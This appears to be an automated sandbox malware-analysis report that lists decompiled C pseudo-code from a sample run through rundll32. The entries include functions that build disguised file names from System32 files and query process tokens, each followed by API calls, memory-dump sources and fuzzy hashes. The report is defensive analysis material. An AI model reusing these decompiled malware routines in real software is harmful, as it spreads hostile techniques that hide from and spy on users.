                                          • Opcode Fuzzy Hash: 9e4700ce08f9990edf51a3dc8748df282c42f48ba2889f8c16a4614c85ff9c0f
                                          • Instruction Fuzzy Hash: 1FE0E573A053156BD730B9B85E88D8F2AECDBD4264B00083AFD85B7204E630DC148AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E04084C3A(void** __esi) {
                                          				char* _v0;
                                          				intOrPtr _t4;
                                          				intOrPtr _t6;
                                          				void* _t8;
                                          				intOrPtr _t11;
                                          				void* _t12;
                                          				void** _t14;
                                          
                                          				_t14 = __esi;
                                          				_t4 =  *0x408d324; // 0x4c895b0
                                          				__imp__(_t4 + 0x40);
                                          				while(1) {
                                          					_t6 =  *0x408d324; // 0x4c895b0
                                          					_t1 = _t6 + 0x58; // 0x0
                                          					if( *_t1 == 0) {
                                          						break;
                                          					}
                                          					Sleep(0xa);
                                          				}
                                          				_t8 =  *_t14;
                                          				if(_t8 != 0 && _t8 != 0x408d030) {
                                          					HeapFree( *0x408d238, 0, _t8);
                                          				}
                                          				_t14[1] = E04087C75(_v0, _t14);
                                          				_t11 =  *0x408d324; // 0x4c895b0
                                          				_t12 = _t11 + 0x40;
                                          				__imp__(_t12);
                                          				return _t12;
                                          			}











                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(04C89570), ref: 04084C43
                                          • Sleep.KERNEL32(0000000A,?,?,?,04084A8B,?,?,?,4D283A53,?,?), ref: 04084C4D
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,04084A8B,?,?,?,4D283A53,?,?), ref: 04084C75
                                          • RtlLeaveCriticalSection.NTDLL(04C89570), ref: 04084C91
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 3fd8c133c0e851fededcac71da1685cff8d349504232080afbdd71bd9968f2a2
                                          • Instruction ID: 9471a5b3aef48b89ea57649f97dfdece0a9b9375bad93a10d55b5735fc5c8338
                                          • Opcode Fuzzy Hash: 3fd8c133c0e851fededcac71da1685cff8d349504232080afbdd71bd9968f2a2
                                          • Instruction Fuzzy Hash: 60F0B7706142419BE754AF68EB48B1977E8EF34785B04462CF5C2F7290E62CEC40DE29
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E040878AD() {
                                          				void* _t1;
                                          				intOrPtr _t5;
                                          				void* _t6;
                                          				void* _t7;
                                          				void* _t11;
                                          
                                          				_t1 =  *0x408d26c; // 0x3bc
                                          				if(_t1 == 0) {
                                          					L8:
                                          					return 0;
                                          				}
                                          				SetEvent(_t1);
                                          				_t11 = 0x7fffffff;
                                          				while(1) {
                                          					SleepEx(0x64, 1);
                                          					_t5 =  *0x408d2b8; // 0x0
                                          					if(_t5 == 0) {
                                          						break;
                                          					}
                                          					_t11 = _t11 - 0x64;
                                          					if(_t11 > 0) {
                                          						continue;
                                          					}
                                          					break;
                                          				}
                                          				_t6 =  *0x408d26c; // 0x3bc
                                          				if(_t6 != 0) {
                                          					CloseHandle(_t6);
                                          				}
                                          				_t7 =  *0x408d238; // 0x4890000
                                          				if(_t7 != 0) {
                                          					HeapDestroy(_t7);
                                          				}
                                          				goto L8;
                                          			}









                                          APIs
                                          • SetEvent.KERNEL32(000003BC,00000001,04086F2D), ref: 040878B8
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 040878C7
                                          • CloseHandle.KERNEL32(000003BC), ref: 040878E8
                                          • HeapDestroy.KERNEL32(04890000), ref: 040878F8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: CloseDestroyEventHandleHeapSleep
                                          • String ID:
                                          • API String ID: 4109453060-0
                                          • Opcode ID: 206168054a9a0b2017887b38d692f2893276c585a0a11b3f5b3a3b79a5fc0c68
                                          • Instruction ID: 1c35c50f9d70165ceaacb57c764266358ba30dd79cb2697683d948e3663d00f4
                                          • Opcode Fuzzy Hash: 206168054a9a0b2017887b38d692f2893276c585a0a11b3f5b3a3b79a5fc0c68
                                          • Instruction Fuzzy Hash: 74F0F871A49315D7F6606E75AF48A067BE9EF157A17240639AC80F72D4CB2CEC00DA70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E04089B10() {
                                          				void* _v0;
                                          				void** _t3;
                                          				void** _t5;
                                          				void** _t7;
                                          				void** _t8;
                                          				void* _t10;
                                          
                                          				_t3 =  *0x408d324; // 0x4c895b0
                                          				__imp__( &(_t3[0x10]));
                                          				while(1) {
                                          					_t5 =  *0x408d324; // 0x4c895b0
                                          					_t1 =  &(_t5[0x16]); // 0x0
                                          					if( *_t1 == 0) {
                                          						break;
                                          					}
                                          					Sleep(0xa);
                                          				}
                                          				_t7 =  *0x408d324; // 0x4c895b0
                                          				_t10 =  *_t7;
                                          				if(_t10 != 0 && _t10 != 0x408e845) {
                                          					HeapFree( *0x408d238, 0, _t10);
                                          					_t7 =  *0x408d324; // 0x4c895b0
                                          				}
                                          				 *_t7 = _v0;
                                          				_t8 =  &(_t7[0x10]);
                                          				__imp__(_t8);
                                          				return _t8;
                                          			}










                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(04C89570), ref: 04089B19
                                          • Sleep.KERNEL32(0000000A,?,?,?,04084A8B,?,?,?,4D283A53,?,?), ref: 04089B23
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,04084A8B,?,?,?,4D283A53,?,?), ref: 04089B51
                                          • RtlLeaveCriticalSection.NTDLL(04C89570), ref: 04089B66
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 53d48c0707783df20f0a5a93801afd1221bd37e140635583e3cb56b89a8997af
                                          • Instruction ID: 1c889ab16b1a6fddab1c850908e272e9442b56dee547667fce1ec490c8885719
                                          • Opcode Fuzzy Hash: 53d48c0707783df20f0a5a93801afd1221bd37e140635583e3cb56b89a8997af
                                          • Instruction Fuzzy Hash: 8FF062B46042019BEB58AF64EB59E2937F5EF58741B05412CE986FB390C62CAC40DE25
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 44%
                                          			E04081EC4(void* __eax, char _a4) {
                                          
                                          				 *0x408d2b0 =  *0x408d2b0 & 0x00000000;
                                          				_push(0);
                                          				_push("pSs");
                                          				_push(1);
                                          				_t1 =  &_a4; // 0x4d283a53
                                          				_push( *_t1);
                                          				 *0x408d2a8 = 0xc;
                                          				L040869E2();
                                          				return __eax;
                                          			}




                                          APIs
                                          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(S:(M,00000001,pSs,00000000), ref: 04081EE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: DescriptorSecurity$ConvertString
                                          • String ID: S:(M$pSs
                                          • API String ID: 3907675253-3661608155
                                          • Opcode ID: dc0507ef530ede86f1c085ee78ec76c0d36b3b5b8bcc41a346251f28f86eb255
                                          • Instruction ID: 8b85942684c0dadd879d815e722394ef5a19081ea168812fbafb71237ce33c73
                                          • Opcode Fuzzy Hash: dc0507ef530ede86f1c085ee78ec76c0d36b3b5b8bcc41a346251f28f86eb255
                                          • Instruction Fuzzy Hash: 20C00274144350AAF621BE009A46F567655EB60729F20061DA180341D083FAA4549A15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E04086B6E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                          				intOrPtr* _v8;
                                          				void* _t17;
                                          				intOrPtr* _t22;
                                          				void* _t27;
                                          				char* _t30;
                                          				void* _t33;
                                          				void* _t34;
                                          				void* _t36;
                                          				void* _t37;
                                          				void* _t39;
                                          				int _t42;
                                          
                                          				_t17 = __eax;
                                          				_t37 = 0;
                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                          				_t2 = _t17 + 1; // 0x1
                                          				_t28 = _t2;
                                          				_t34 = E040858BE(_t2);
                                          				if(_t34 != 0) {
                                          					_t30 = E040858BE(_t28);
                                          					if(_t30 == 0) {
                                          						E0408147E(_t34);
                                          					} else {
                                          						_t39 = _a4;
                                          						_t22 = E0408A8D2(_t39);
                                          						_v8 = _t22;
                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                          							_a4 = _t39;
                                          						} else {
                                          							_t26 = _t22 + 2;
                                          							_a4 = _t22 + 2;
                                          							_t22 = E0408A8D2(_t26);
                                          							_v8 = _t22;
                                          						}
                                          						if(_t22 == 0) {
                                          							__imp__(_t34, _a4);
                                          							 *_t30 = 0x2f;
                                          							 *((char*)(_t30 + 1)) = 0;
                                          						} else {
                                          							_t42 = _t22 - _a4;
                                          							memcpy(_t34, _a4, _t42);
                                          							 *((char*)(_t34 + _t42)) = 0;
                                          							__imp__(_t30, _v8);
                                          						}
                                          						 *_a8 = _t34;
                                          						_t37 = 1;
                                          						 *_a12 = _t30;
                                          					}
                                          				}
                                          				return _t37;
                                          			}















                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,0408A006,?,?,?,?,00000102,040866AF,?,?,00000000), ref: 04086B7A
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                            • Part of subcall function 0408A8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04086BA8,00000000,00000001,00000001,?,?,0408A006,?,?,?,?,00000102), ref: 0408A8E0
                                            • Part of subcall function 0408A8D2: StrChrA.SHLWAPI(?,0000003F,?,?,0408A006,?,?,?,?,00000102,040866AF,?,?,00000000,00000000), ref: 0408A8EA
                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0408A006,?,?,?,?,00000102,040866AF,?), ref: 04086BD8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04086BE8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04086BF4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3767559652-0
                                          • Opcode ID: d1e48e466ad11fcc0b944588ed96b9624fd5c48b5666d4f6c7d971bd6d9001b1
                                          • Instruction ID: cb2d16e6ca5be3a7cc2a61a146ae8bca716b9791b96644c3897ea867f1ceae3a
                                          • Opcode Fuzzy Hash: d1e48e466ad11fcc0b944588ed96b9624fd5c48b5666d4f6c7d971bd6d9001b1
                                          • Instruction Fuzzy Hash: EF21F371504249FFDB126FB4CA44AAE7FF8DF06288B054468E984BB201E736E9408BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04085FCB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                          				void* _v8;
                                          				void* _t18;
                                          				int _t25;
                                          				int _t29;
                                          				int _t34;
                                          
                                          				_t29 = lstrlenW(_a4);
                                          				_t25 = lstrlenW(_a8);
                                          				_t18 = E040858BE(_t25 + _t29 + _t25 + _t29 + 2);
                                          				_v8 = _t18;
                                          				if(_t18 != 0) {
                                          					_t34 = _t29 + _t29;
                                          					memcpy(_t18, _a4, _t34);
                                          					_t10 = _t25 + 2; // 0x2
                                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                          				}
                                          				return _v8;
                                          			}

                                          APIs
                                          • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,04C8937C,?,0408694E,004F0053,04C8937C,?,?,?,?,?,?,04089C10), ref: 04085FDB
                                          • lstrlenW.KERNEL32(0408694E,?,0408694E,004F0053,04C8937C,?,?,?,?,?,?,04089C10), ref: 04085FE2
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,0408694E,004F0053,04C8937C,?,?,?,?,?,?,04089C10), ref: 04086002
                                          • memcpy.NTDLL(751469A0,0408694E,00000002,00000000,004F0053,751469A0,?,?,0408694E,004F0053,04C8937C), ref: 04086015
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpy$AllocateHeap
                                          • String ID:
                                          • API String ID: 2411391700-0
                                          • Opcode ID: bee36b381d0d4f0f75fee3bd0cacc72acffdf6b545e06748bba0534e5846c0de
                                          • Instruction ID: ec61695dd999fea67bd163532b12ee7c4b790cc337aeb28af7d58ad242f927c9
                                          • Opcode Fuzzy Hash: bee36b381d0d4f0f75fee3bd0cacc72acffdf6b545e06748bba0534e5846c0de
                                          • Instruction Fuzzy Hash: 5FF03C72900119BB9B11EFA8CD85CDF7BACEF092987154466A944E7201E635EA109BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,00000000,00000000,04085335,616D692F,00000000), ref: 04089DFB
                                          • lstrlen.KERNEL32(?), ref: 04089E03
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04089E1A
                                          • lstrcat.KERNEL32(00000000,?), ref: 04089E25
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                          • String ID:
                                          • API String ID: 74227042-0
                                          • Opcode ID: 387bf997c65f0e792ce936fd43ab7bb66f0bf6df336830d8e99cbea4548cac03
                                          • Instruction ID: 29f806928a4d9ef2a1a3271e3ec79e9f11f8fa08973e9420be83552eada48453
                                          • Opcode Fuzzy Hash: 387bf997c65f0e792ce936fd43ab7bb66f0bf6df336830d8e99cbea4548cac03
                                          • Instruction Fuzzy Hash: ABE01233809621AB97127FE4AD08C9FBFB9FF89260705492AF690A7114C739D8158FE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Control-flow Graph

                                          C-Code - Quality: 93%
                                          			E047B32BA(signed char* __eax, intOrPtr* _a4) {
                                          				signed int _v12;
                                          				void* _v16;
                                          				CHAR* _v20;
                                          				struct _FILETIME _v28;
                                          				void* _v32;
                                          				void* _v36;
                                          				char* _v40;
                                          				signed int _v44;
                                          				long _v344;
                                          				struct _WIN32_FIND_DATAA _v368;
                                          				signed int _t72;
                                          				void* _t74;
                                          				signed int _t76;
                                          				void* _t78;
                                          				intOrPtr _t81;
                                          				CHAR* _t83;
                                          				void* _t85;
                                          				signed char _t89;
                                          				signed char _t91;
                                          				intOrPtr _t93;
                                          				void* _t96;
                                          				long _t99;
                                          				int _t101;
                                          				signed int _t109;
                                          				char* _t111;
                                          				void* _t113;
                                          				int _t119;
                                          				char _t128;
                                          				void* _t134;
                                          				signed int _t136;
                                          				char* _t139;
                                          				signed int _t140;
                                          				char* _t141;
                                          				char* _t146;
                                          				signed char* _t148;
                                          				int _t151;
                                          				void* _t152;
                                          				void* _t153;
                                          				void* _t154;
                                          				void* _t165;
                                          
                                          				_v12 = _v12 & 0x00000000;
                                          				_t148 = __eax;
                                          				_t72 =  *0x47bd2a0; // 0x59935a40
                                          				_t74 = RtlAllocateHeap( *0x47bd238, 0, _t72 ^ 0x59935b44);
                                          				_v20 = _t74;
                                          				if(_t74 == 0) {
                                          					L36:
                                          					return _v12;
                                          				}
                                          				_t76 =  *0x47bd2a0; // 0x59935a40
                                          				_t78 = RtlAllocateHeap( *0x47bd238, 0, _t76 ^ 0x59935a4d);
                                          				_t146 = 0;
                                          				_v36 = _t78;
                                          				if(_t78 == 0) {
                                          					L35:
                                          					HeapFree( *0x47bd238, _t146, _v20);
                                          					goto L36;
                                          				}
                                          				_t136 =  *0x47bd2a0; // 0x59935a40
                                          				memset(_t78, 0, _t136 ^ 0x59935a4d);
                                          				_t81 =  *0x47bd2a4; // 0x24fa5a8
                                          				_t154 = _t153 + 0xc;
                                          				_t5 = _t81 + 0x47be7e8; // 0x73797325
                                          				_t83 = E047B77E6(_t5);
                                          				_v20 = _t83;
                                          				if(_t83 == 0) {
                                          					L34:
                                          					HeapFree( *0x47bd238, _t146, _v36);
                                          					goto L35;
                                          				}
                                          				_t134 = 0xffffffffffffffff;
                                          				_v28.dwLowDateTime = 0x59935a4d;
                                          				_v28.dwHighDateTime = 0x59935a4d;
                                          				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                          				_v32 = _t85;
                                          				if(_t85 != 0x59935a4d) {
                                          					GetFileTime(_t85,  &_v28, 0, 0);
                                          					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                          					asm("adc dword [ebp-0x14], 0xc9"); // executed
                                          					FindCloseChangeNotification(_v32); // executed
                                          				}
                                          				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                          				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                          				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                          				 *_t148 = _t91;
                                          				_v32 = _t91 & 0x000000ff;
                                          				_t93 =  *0x47bd2a4; // 0x24fa5a8
                                          				_t16 = _t93 + 0x47be809; // 0x642e2a5c
                                          				_v40 = _t146;
                                          				_v44 = _t89 & 0x000000ff;
                                          				__imp__(_v20, _t16);
                                          				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                          				_v16 = _t96;
                                          				if(_t96 == _t134) {
                                          					_t146 = 0;
                                          					goto L34;
                                          				}
                                          				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                          				while(_t99 > 0) {
                                          					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                          					if(_t101 == 0) {
                                          						FindClose(_v16);
                                          						_v16 = FindFirstFileA(_v20,  &_v368);
                                          						_v28.dwHighDateTime = _v344;
                                          						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                          					}
                                          					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                          				}
                                          				_v12 = _v12 & 0x00000000;
                                          				while(1) {
                                          					_t109 = _v44;
                                          					if(_v12 <= _t109) {
                                          						goto L15;
                                          					}
                                          					_t140 = _v12;
                                          					if(_t140 > _v32) {
                                          						_t141 = _v36;
                                          						 *_a4 = _t141;
                                          						while(1) {
                                          							_t128 =  *_t141;
                                          							if(_t128 == 0) {
                                          								break;
                                          							}
                                          							if(_t128 < 0x30) {
                                          								 *_t141 = _t128 + 0x20;
                                          							}
                                          							_t141 = _t141 + 1;
                                          						}
                                          						_v12 = 1;
                                          						FindClose(_v16); // executed
                                          						_t146 = 0;
                                          						goto L35;
                                          					}
                                          					_t165 = _t140 - _t109;
                                          					L15:
                                          					if(_t165 == 0 || _v12 == _v32) {
                                          						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                          						_t139 = _v40;
                                          						_t151 = _t111 -  &(_v368.cFileName);
                                          						_t113 = 0;
                                          						if(_t139 != 0) {
                                          							_t48 = _t151 - 4; // -4
                                          							_t113 = _t48;
                                          							if(_t113 > _t151) {
                                          								_t113 = 0;
                                          							}
                                          						}
                                          						if(_t151 > 4) {
                                          							_t151 = 4;
                                          						}
                                          						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                          						_t154 = _t154 + 0xc;
                                          						_v40 =  &(_v40[_t151]);
                                          					}
                                          					do {
                                          						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                          						if(_t119 == 0) {
                                          							FindClose(_v16);
                                          							_v16 = FindFirstFileA(_v20,  &_v368);
                                          						}
                                          					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                          					_v12 = _v12 + 1;
                                          				}
                                          			}

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 047B32E5
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 047B3307
                                          • memset.NTDLL ref: 047B3321
                                            • Part of subcall function 047B77E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,047B333A,73797325), ref: 047B77F7
                                            • Part of subcall function 047B77E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 047B7811
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 047B335F
                                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 047B3373
                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 047B338A
                                          • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 047B3396
                                          • lstrcat.KERNEL32(?,642E2A5C), ref: 047B33D7
                                          • FindFirstFileA.KERNEL32(?,?), ref: 047B33ED
                                          • CompareFileTime.KERNEL32(?,?), ref: 047B340B
                                          • FindNextFileA.KERNELBASE(047B207E,?), ref: 047B341F
                                          • FindClose.KERNEL32(047B207E), ref: 047B342C
                                          • FindFirstFileA.KERNEL32(?,?), ref: 047B3438
                                          • CompareFileTime.KERNEL32(?,?), ref: 047B345A
                                          • StrChrA.SHLWAPI(?,0000002E), ref: 047B348D
                                          • memcpy.NTDLL(00000000,?,00000000), ref: 047B34C6
                                          • FindNextFileA.KERNELBASE(047B207E,?), ref: 047B34DB
                                          • FindClose.KERNEL32(047B207E), ref: 047B34E8
                                          • FindFirstFileA.KERNEL32(?,?), ref: 047B34F4
                                          • CompareFileTime.KERNEL32(?,?), ref: 047B3504
                                          • FindClose.KERNEL32(047B207E), ref: 047B3539
                                          • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 047B354B
                                          • HeapFree.KERNEL32(00000000,?), ref: 047B355B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                          • String ID:
                                          • API String ID: 2944988578-0
                                          • Opcode ID: e9fe2dd770be5ebb2b7b1618efc6777356249a054c56e102df86131edcfd8ac9
                                          • Instruction ID: f250e53aa296777e6c0812538a0cfdfea336f5c8ebb5b6ddee669df9899b265e
                                          • Opcode Fuzzy Hash: e9fe2dd770be5ebb2b7b1618efc6777356249a054c56e102df86131edcfd8ac9
                                          • Instruction Fuzzy Hash: 47813B71D00119AFDB119FA5DC88FEEBBB9EF44300F14846AE945E6250E774AA84CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 38%
                                          			E047B71B9(char _a4, void* _a8) {
                                          				void* _v8;
                                          				void* _v12;
                                          				char _v16;
                                          				void* _v20;
                                          				char _v24;
                                          				char _v28;
                                          				char _v32;
                                          				char _v36;
                                          				char _v40;
                                          				void* _v44;
                                          				void** _t33;
                                          				void* _t40;
                                          				void* _t43;
                                          				void** _t44;
                                          				intOrPtr* _t47;
                                          				char _t48;
                                          
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v20 = _a4;
                                          				_t48 = 0;
                                          				_v16 = 0;
                                          				_a4 = 0;
                                          				_v44 = 0x18;
                                          				_v40 = 0;
                                          				_v32 = 0;
                                          				_v36 = 0;
                                          				_v28 = 0;
                                          				_v24 = 0;
                                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                          					_t33 =  &_v8;
                                          					__imp__(_v12, 8, _t33);
                                          					if(_t33 >= 0) {
                                          						_t47 = __imp__;
                                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                          						_t44 = E047B58BE(_a4);
                                          						if(_t44 != 0) {
                                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                          							if(_t40 >= 0) {
                                          								memcpy(_a8,  *_t44, 0x1c);
                                          								_t48 = 1;
                                          							}
                                          							E047B147E(_t44);
                                          						}
                                          						NtClose(_v8); // executed
                                          					}
                                          					NtClose(_v12);
                                          				}
                                          				return _t48;
                                          			}

                                          APIs
                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 047B7200
                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 047B7213
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 047B722F
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 047B724C
                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 047B7259
                                          • NtClose.NTDLL(?), ref: 047B726B
                                          • NtClose.NTDLL(00000000), ref: 047B7275
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2575439697-0
                                          • Opcode ID: 57b863984d5de5b40ecdf1160ae6c248c52ff7e3269e9ee352704d8c1de5b585
